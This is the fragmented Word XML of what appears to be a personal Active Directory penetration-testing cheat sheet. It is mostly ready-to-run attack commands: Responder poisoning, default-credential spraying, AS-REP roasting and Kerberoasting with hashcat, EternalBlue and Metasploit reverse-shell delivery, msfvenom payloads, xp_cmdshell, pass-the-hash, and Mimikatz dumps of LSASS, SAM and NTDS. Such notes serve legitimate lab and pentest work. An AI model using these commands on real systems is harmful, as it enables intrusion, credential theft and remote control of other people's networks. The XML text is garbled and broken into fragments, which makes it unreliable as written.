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Responder</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000002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sudo responder -I eth0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./netexec.sh &lt;ip&gt; [user.list] [pass.list]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Printnightmare?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Nopac?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EternalBlue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Backup Operator NTDS Dump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Bitlocker?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DPAPI Hash Dump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Anti-virus?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with Impersonation Privileges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Creds from Windows Logs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Descriptions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 Fields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Unix User Passwords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LDAP User Passwords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Autlogin Information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GPP Plaintext Passwords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Impersonate Tokens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LSASSY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SMB Ghost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KeePass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PowerShell History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Putty Private Keys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RDCman Dump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UAC status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Loot VNC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Enumerate Linked SQL Servers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Enumerate SQL Server Logins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Zerologon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ldap --gmsa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enum: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enum4linux-ng -A hostname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password policy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for any anonymous access to smb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for anonymous access to the rpc calls (enumdomusers, and rid brute forcing)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Deprecated windows server or Windows 10 versions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for any anonymous access to rpc calls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rpcclient -U "" -N host </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000027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help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Try any rpc calls that can leak information, if available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netexec to see smb details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 for smbv1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 for smb signing disabled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Deprecated windows server or Windows 10 versions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SMBClient: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23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smbclient -L //10.0.2.4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List SMB shares (anonymous if no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-U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user supplied).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23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smbclient //10.0.2.4/Share -U username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Connect interactively to an SMB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netexec with all the default logins on all services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admin:admin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admin:administrator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administrator:administrator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administrator:admin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admin:blank pass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administrator :blank pass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guest:blank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guest:guest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abc:blank &lt;- this is for null auth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Abc:password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AS-REP Roasting (To get a no preauth hash): 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GetNPUsers.py [Domain]/ -usersfile /usr/share/wordlists/seclists/Usernames/xato-net-10-million-usernames.txt -dc-ip [IP] -request -format hashcat | grep -v "Client not found"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nxc ldap [IP Address] -u user.txt -p '' --asreproast output.txt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Crack with hashcat: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hashcat -m18200 output.txt wordlist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 Go for Kerbroasting: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nxc ldap [IP] -u [user] -p '' --no-preauth-targets [users.txt] --kerberoasting output.txt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Kerberos brute forcing to look for users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nxc ldap “[IP ADDRESS]” -u "[User Wordlist]" -p '' -k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Kerbrute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kerbrute userenum -d {domain} -dc {ip} wordlist -t 100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eternal blue if it is available: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msfconsole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search exploit/windows/smb/ms17_010_psexec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 0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RHOSTS &lt;ip&gt;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SMBDomain domain.local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SMBUser &lt;user&gt;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SMBPass &lt;password&gt;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LHOST &lt;local ip&gt;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run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MSSQL try xp_cmdshell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impacket-mssqlclient domain.local/user@ip -windows-auth -port 1433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use_link [DC00.domain.local] (IF linked)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enable_xp_cmdshell (If not enabled)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xp_cmdshell powershell -e [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https://www.revshells.com/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PS #3]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Msfvenom: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msfvenom -p windows/x64/meterpreter_reverse_tcp LHOST=IP LPORT=PORT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SMB_delivery (metaspoit session)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msfconsole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 exploit/windows/smb/smb_delivery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LHOST &lt;ip&gt;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SRVHOST &lt;ip&gt;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run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nxc smb &lt;ip&gt; -u &lt;user&gt; -p ‘password’ -X ‘[script from metasploit]’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Web Delivery (metaspoit session)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msfconsole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 exploit/multi/script/web_delivery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target 2 (FOR Powershell)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SRVHOST [Your IP]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LHOST [Your IP]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payload windows/meterpreter/reverse_tcp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run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v6b8ugm8s7rs" w:id="0"/>
      <w:bookmarkEnd w:id="0"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">User found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netexec.sh</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> with the creds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nxc to access on all services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bloodhound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sudo bloodhound-python -u 'username' -p pass -d domain -c all -ns ip --zip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enum4linux-ng as them again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enum4linux-ng -A host -u user -p pass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Kerberoasting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Put the domain into the /etc/hosts file first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GetUserSPNs.py -dc-ip [IP address] [domain.name]/[user] -request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nxc ldap [IP] -u [user] -p pass --kerberoasting output.txt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nxc says pwned, get shell and run winpeas on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mssql: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privesc:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000078">
      <w:pPr>
        <w:ind w:left="216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nxc mssql host -u user -p pass -M mssql_priv -o ACTION=privesc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 the Hash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evil-winrm -i &lt;ip&gt; -u Administrator -H &lt;hash&gt;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Upload [filepath]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Download [windows path] [linux path]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PSEXEC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impacket-psexec domain/username:password@target_ip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impacket-psexec domain/administrator@IP -hashes hash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Meterpreter Session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getsystem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run post/windows/gather/hashdump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Tokens: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load incognito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list_tokens -u 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i w:val="1"/>
          <w:highlight w:val="white"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">impersonate_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i w:val="1"/>
          <w:highlight w:val="white"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> “NT AUTHORITY\SYSTEM”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Mimikatz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load kiwi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dcsync </w:t>
        <w:tab/>
        <w:tab/>
        <w:t xml:space="preserve">&lt;- secretsdump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lsa_dump_sam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Lsa_dump_secrets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creds_all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Mimikatz Manually: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LSASS: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“privilege::debug” “log” sekurlsa::logonpasswords”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MSV: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“privilege::debug” “log” “sekurlsa::msv”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Keberos Ticket Dump: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“privilege::debug” “log” “sekurlsa::tickets” /export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SAM dump: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“privilege::debug” “log” “token::elevate” “lsadump::sam”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LSA Secrets Dump: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“privilege::debug” “log” “token::elevate” “lsadump:secrets”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Domain Logon Hashes Dump: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“privilege::debug” “log” “token::elevate” “lsadump::cache”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DPAPI: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“privilege::debug” “log” “token::elevate” “sekurlsa::dpapi”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Ntds.dit Dump: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“privilege::debug” “log” “token::elevate” “lsadump::dsync” /domain:&lt;target_domain&gt; /user:domain\administrator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multi/recon/local_exploit_suggester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Find deleted AD Object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c1c1d"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Get-ADObject -ldapFilter:"(msDS-LastKnownRDN=*)" -IncludeDeletedObjects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color w:val="1c1c1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c1c1d"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Restore object: Restore-ADObject -Identity '938182c3-bf0b-410a-9aaa-45c8e1a02ebf'</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000009A">
      <w:pPr>
        <w:ind w:left="1440" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1c1c1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c1c1d"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Other way</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000009B">
      <w:pPr>
        <w:ind w:left="1440" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1c1c1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c1c1d"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Get-ADObject -filter 'isdeleted -eq $true' -includeDeletedObjects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color w:val="1c1c1d"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="1c1c1d"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Adcs detect vulnerabilities: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color w:val="1c1c1d"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:fill="f2f2f3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certipy-ad find -u [username] -p [password] or --hashes [NT hash] -dc-ip [DC IP] -stdout -vulnerable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Powershell Log History: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(Get-PSReadlineOption).HistorySavePath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 C:\Users\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&lt;USER&gt;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\appdata\roaming\microsoft\windows\PowerShell\PSReadLine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Get-History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Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1c1c1d"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:fill="f2f2f3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vshells.com/" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://netexec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